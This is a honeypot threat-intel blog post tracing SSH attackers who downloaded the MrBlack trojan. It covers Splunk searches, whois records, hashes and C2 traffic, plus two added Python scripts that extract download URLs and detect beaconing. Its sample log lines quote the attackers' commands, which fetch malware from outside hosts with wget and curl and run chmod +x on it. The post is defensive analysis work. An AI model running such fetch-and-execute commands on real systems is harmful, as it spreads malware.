Threat Intel | Meeting Mr. Black
My honeypots haven't been getting much action lately... poor guys. But I got lucky and had some individuals log on to them this morning, so I figured I'd do another blog post about their activity.
So, I'm starting to use Splunk to manage my honeypot data (more on this to come later; awesome news to share!), which makes it a ton easier to search and parse out. With that being said, let's dive into it...
First, I ran a search to pull out all the honeypot sessions where commands were actually entered, as opposed to sessions that were just started before the attacker bailed. That search looked like this:
index=kippo cmd=* | rex field=cmd "wget\s(?<url>.*)" | search url=* | table url, src_ip, _time, host, session_id
Once that search finished, I was left with all the commands that contained URLs, so I could see what malware was being downloaded. I know that regex sucks, but it worked for my scenario. I was left with these results:
So, we can see two attackers. I'm assuming they are possibly related, but no guarantees yet. The first attacker, 222.186.15.239, was seen downloading a file from http://222.186.15.239:7070. That HTTP File Server wasn't serving up much, so I started checking out the other server and attacker.
The next attacker was 222.186.34.161, which downloaded a bunch of malware for varying architectures from http://115.29.165.174:65326.
222.186.34.161 is an IP in CHINANET Jiangsu Province Network (shocker, I know...). The malware hosting IP, 115.29.165.174, is registered to Aliyun Computing Co., LTD, located in... China. Again, shocker, I know.
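The same extraction the Splunk search above does, written as a standalone script so it can be run over raw kippo logs without Splunk. This is an added example, not part of the original post or of kippo itself: the log lines are constructed in a kippo-like format (the session id and source IP sit in the bracketed transport field), the `wget`/`curl` regex skips leading option flags and stops at a shell separator so a trailing `; chmod +x` doesn't end up in the URL, and the results are grouped per attacking IP so the pairing of attacker to hosting server falls out directly.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample lines in a kippo-like format (not real honeypot data).
SAMPLE_LOG = """\
2015-02-10 08:12:33+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,12,222.186.34.161] CMD: cd /tmp
2015-02-10 08:12:34+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,12,222.186.34.161] CMD: wget http://115.29.165.174:65326/ss64
2015-02-10 08:12:36+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,12,222.186.34.161] CMD: wget -q http://115.29.165.174:65326/ss32; chmod +x ss32
2015-02-10 09:01:02+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,13,222.186.15.239] CMD: curl -O http://222.186.15.239:7070/x
2015-02-10 09:30:00+0000 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,14,10.0.0.9] CMD: uname -a
"""

# One kippo-style line: timestamp, bracketed transport info ending in
# "HoneyPotTransport,<session>,<src_ip>", then "CMD: <command>".
LINE_RE = re.compile(
    r"^(?P<time>\S+ \S+) \[.*?HoneyPotTransport,(?P<session>\d+),(?P<src_ip>[\d.]+)\] CMD: (?P<cmd>.*)$"
)

# The URL argument of wget/curl: skip any leading "-x" style options and
# stop at whitespace or a shell separator (; & |) so chained commands
# don't leak into the URL.
URL_RE = re.compile(r"\b(?:wget|curl)\s+(?:-\S+\s+)*(?P<url>https?://[^\s;&|]+)")


def extract_downloads(log_text):
    """Return one record per wget/curl URL seen in the command log."""
    records = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        for u in URL_RE.finditer(m["cmd"]):
            url = u["url"]
            records.append({
                "time": m["time"],
                "session": m["session"],
                "src_ip": m["src_ip"],
                "url": url,
                # netloc keeps host:port together; urlparse().port is avoided on
                # purpose because it rejects out-of-range port numbers.
                "server": urlparse(url).netloc,
            })
    return records


def servers_by_source(records):
    """Map each attacking IP to the sorted list of hosting servers it pulled from."""
    grouped = defaultdict(set)
    for r in records:
        grouped[r["src_ip"]].add(r["server"])
    return {ip: sorted(servers) for ip, servers in grouped.items()}


if __name__ == "__main__":
    recs = extract_downloads(SAMPLE_LOG)
    for r in recs:
        print(f'{r["time"]}  session={r["session"]:<3} {r["src_ip"]:<16} {r["url"]}')
    print(servers_by_source(recs))
```

Running it on real kippo output is just a matter of feeding `open("kippo.log").read()` to `extract_downloads`; sessions with no download command (the `uname -a` line above) are silently dropped, which matches the `search url=*` filter in the Splunk query.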
inetnum: 115.28.0.0 - 115.29.255.255
netname: ALISOFT
descr: Aliyun Computing Co., LTD
descr: 5F, Builing D, the West Lake International Plaza of S&T
descr: No.391 Wen'er Road, Hangzhou, Zhejiang, China, 310099
country: CN
admin-c: ZM1015-AP
tech-c: ZM877-AP
tech-c: ZM876-AP
tech-c: ZM875-AP
mnt-by: MAINT-CNNIC-AP
mnt-irt: IRT-CNNIC-CN
status: ALLOCATED PORTABLE
changed: ipas@cnnic.cn 20140730
source: APNIC
This guy is plenty active according to multiple IP reputation services. Thanks to threatrecon.co for some good indicator searching; here are a few results, but there were plenty more:
Here's a screenshot of the HTTP File Server and all the malware it's serving:
Moving onto the malware, I started looking at ss64, which is an ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, stripped.
SHA256: 565097e41b4721c34c49ada6c3552d3f2f98fc9bdd516f3ff8944e1fb5c8e8fe
MD5: 74941428a497544fb5bdf4319951eff7
I uploaded this to VirusTotal and malwr.com; however, neither proved to be that fruitful. I submitted the 32-bit version of ss to the same sites, and it popped up about 4 times as MrBlack Trojan, which I'm not too familiar with, seeing as how I'm pretty new to the whole malware analysis scene. So, since the dynamic malware analysis tools I would use didn't seem to be that helpful, I gave a shot at just seeing what I could find. I ran the file on a spun-up Kali instance and it would just hang here forever.
Since that's all that was happening, I decided to check out the behind-the-scenes comms, hoping to identify the server.
Int Server...
connect to server...
Looking at 192.161.60.184, it appears to be an IP out of a California based hosting company:
NetRange: 192.161.48.0 - 192.161.63.255
CIDR: 192.161.48.0/20
NetName: QUADRANET
NetHandle: NET-192-161-48-0-1
Parent: NET192 (NET-192-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS29761, AS8100
Organization: QuadraNet, Inc (QUADR-20)
RegDate: 2012-11-01
Updated: 2015-01-14
Ref: http://whois.arin.net/rest/net/NET-192-161-48-0-1
Doing some recon on that box, I noticed it was running various services, including IIS, which possibly identified it as a Chinese user, due to the language present on the running services.
I started running a tcpdump to try and see what type of communication was happening.
kali> tcpdump -i eth0 -nnvvXS dst 192.161.60.184 -w /tmp/black.pcap
The above screenshot was the only thing distinct about the communication so far: my OS, kali, and another thing of interest, Mr.Black, which just reinforces the results from VirusTotal. I'm currently running tcpdump to see if anything else ever happens besides what appear to be keep-alive messages or beacons. Ninja Edit: I let it run overnight, and there was nothing of interest, so I'm not sure how often C2 comms get sent, or if I'm missing something. So, if anyone knows more about Mr.Black, please let me know.
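One way to answer the "how often does it beacon" question from a capture like the one above is to measure the inter-arrival times of data-bearing packets per flow and flag flows whose interval barely varies. This is an added example, not part of the original post: the tcpdump lines are constructed (the kind of text you would get from reading the saved file back with `tcpdump -nn -r /tmp/black.pcap`, since `-w` writes raw packets rather than the `-X` text output), and the thresholds (at least four packets, coefficient of variation of the gaps at or below 0.1) are assumptions chosen for the sample. The first flow below sends a 36-byte payload every ~30 seconds, the second is ordinary bursty web traffic to a documentation-range address.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed tcpdump-style lines (not a capture from the post). Flow 1 is a
# periodic 36-byte beacon; flow 2 is irregular traffic to 203.0.113.5 (TEST-NET-3).
SAMPLE_TCPDUMP = """\
12:00:00.000000 IP 10.0.2.15.48812 > 192.161.60.184.80: Flags [P.], seq 1:37, ack 1, win 229, length 36
12:00:05.000000 IP 10.0.2.15.51000 > 203.0.113.5.443: Flags [P.], seq 1:518, ack 1, win 229, length 517
12:00:07.000000 IP 10.0.2.15.51000 > 203.0.113.5.443: Flags [P.], seq 518:600, ack 1400, win 229, length 82
12:00:30.010000 IP 10.0.2.15.48812 > 192.161.60.184.80: Flags [P.], seq 37:73, ack 37, win 229, length 36
12:00:30.011000 IP 10.0.2.15.48812 > 192.161.60.184.80: Flags [.], ack 73, win 229, length 0
12:00:40.000000 IP 10.0.2.15.51000 > 203.0.113.5.443: Flags [P.], seq 600:1100, ack 1400, win 229, length 500
12:01:00.020000 IP 10.0.2.15.48812 > 192.161.60.184.80: Flags [P.], seq 73:109, ack 73, win 229, length 36
12:01:30.005000 IP 10.0.2.15.48812 > 192.161.60.184.80: Flags [P.], seq 109:145, ack 109, win 229, length 36
12:01:50.000000 IP 10.0.2.15.51000 > 203.0.113.5.443: Flags [P.], seq 1100:1300, ack 2000, win 229, length 200
12:02:00.015000 IP 10.0.2.15.48812 > 192.161.60.184.80: Flags [P.], seq 145:181, ack 145, win 229, length 36
"""

# tcpdump -nn IPv4/TCP summary line: "HH:MM:SS.ffffff IP src.sport > dst.dport: ... length N"
PKT_RE = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) IP (?P<src>[\d.]+)\.(?P<sport>\d+) > "
    r"(?P<dst>[\d.]+)\.(?P<dport>\d+): .*length (?P<len>\d+)$"
)


def parse_packets(text):
    """Parse tcpdump summary lines into dicts with a seconds-since-midnight timestamp."""
    pkts = []
    for line in text.splitlines():
        m = PKT_RE.match(line)
        if not m:
            continue
        t = datetime.strptime(m["ts"], "%H:%M:%S.%f")
        secs = t.hour * 3600 + t.minute * 60 + t.second + t.microsecond / 1e6
        pkts.append({"t": secs, "src": m["src"], "dst": m["dst"],
                     "dport": int(m["dport"]), "len": int(m["len"])})
    return pkts


def beacon_profile(pkts, min_packets=4, max_cv=0.1):
    """Per (src, dst, dport) flow: packet count, mean gap, gap jitter, and a beacon verdict."""
    flows = defaultdict(list)
    for p in pkts:
        if p["len"] > 0:  # only payload-carrying packets; bare ACKs say nothing about cadence
            flows[(p["src"], p["dst"], p["dport"])].append(p["t"])
    profile = {}
    for flow, times in flows.items():
        times.sort()
        gaps = [b - a for a, b in zip(times, times[1:])]
        mean = statistics.mean(gaps) if gaps else 0.0
        # Coefficient of variation of the gaps: near zero means a fixed timer.
        cv = statistics.pstdev(gaps) / mean if len(gaps) >= 2 and mean > 0 else None
        profile[flow] = {
            "count": len(times),
            "mean_interval": round(mean, 3),
            "jitter_cv": None if cv is None else round(cv, 3),
            "is_beacon": len(times) >= min_packets and cv is not None and cv <= max_cv,
        }
    return profile


if __name__ == "__main__":
    for flow, info in beacon_profile(parse_packets(SAMPLE_TCPDUMP)).items():
        src, dst, dport = flow
        print(f"{src} -> {dst}:{dport}  {info}")
```

The payload size is deliberately not used as a feature here; a fixed-size, fixed-interval flow is the strongest signal, but the interval alone is what tells you the C2 check-in period, which is the number the overnight capture would have produced had the sample kept beaconing.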
Lastly, here's a little sketch of the communications and systems involved. I'm more of a visual learner and enjoy when things are visually depicted as well as spelled out, so I wanted to include something like this.